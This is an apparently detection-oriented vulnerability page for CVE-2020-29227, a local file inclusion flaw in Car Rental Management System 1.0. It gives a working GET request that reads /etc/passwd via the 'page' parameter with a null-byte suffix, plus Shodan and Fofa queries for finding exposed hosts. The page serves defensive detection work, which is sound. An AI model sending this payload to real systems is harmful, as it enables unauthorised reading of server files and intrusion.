🔙 목록으로 돌아가기

CVE-2020-29227: Car Rental Management System 1.0 - Local File Inclusion

TitleCar Rental Management System 1.0 - Local File Inclusion
Authordaffainfo
SeverityCritical
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationApply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0.
CVSS Score9.8
EPSS Score0.93408
CVE IDCVE-2020-29227
Shodan Queryhttp.html:"car rental management system"
Fofa Querybody="car rental management system"
Tags cve cve2020 lfi car_rental_management_system_project sqli vkev vuln

🔍 Vulnerability Description

Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the “page” parameter, leading to code execution.

🌐 HTTP Request

GET /index.php?page=/etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29227.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-29227.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A